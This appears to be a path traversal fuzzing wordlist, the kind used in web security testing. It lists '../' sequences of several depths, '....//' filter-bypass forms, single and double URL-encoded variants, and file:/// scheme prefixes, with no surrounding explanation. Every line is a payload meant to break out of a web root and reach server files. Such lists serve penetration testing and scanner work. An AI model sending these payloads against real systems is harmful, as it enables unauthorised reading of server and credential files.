../../../../../../../../..
../../../../../..
../../../..
../..
..
....//....//....//....//....//....//....
....//....//....//....//....
....//....//....//....
....//....//....
....//....//....
....//....
....
....%2f%2f....%2f%2f....%2f%2f....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....
....%2f%2f....
....%2f%2f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..
..%2f..%2f..%2f..%2f..%2f..
..%2f..%2f..%2f..%2f..
..%2f..%2f..%2f..
..%2f..%2f..
..%2f..
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..
..%252f..%252f..%252f..%252f..%252f..%252f..
..%252f..%252f..%252f..%252f..%252f..
..%252f..%252f..%252f..%252f..
..%252f..%252f..%252f..
..%252f..%252f..
..%252f..
..%252F
file:///
file:%2F%2F%2F
